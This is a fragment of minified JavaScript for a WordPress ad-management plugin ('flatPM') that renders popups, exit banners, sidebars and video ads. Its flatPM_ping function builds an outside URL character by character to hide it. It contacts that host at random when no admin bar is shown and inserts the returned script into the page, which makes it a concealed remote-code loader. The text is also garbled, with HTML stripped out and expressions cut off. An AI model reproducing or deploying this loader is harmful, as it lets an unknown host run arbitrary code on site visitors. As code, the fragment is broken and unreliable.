        "),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
        Закрыть через '+o.how.outgoing.timer_count+"
        ":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
        '+c+"
        ");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
        '),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
        "],tbody:[1,"","
        "],colgroup:[2,"","
        "],col:[3,"","
        "],tr:[2,"","
        "],td:[3,"","
        "],th:[3,"","
        "],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
        '+a+" через "+o+'
        '+n+'
        ',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
        ');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};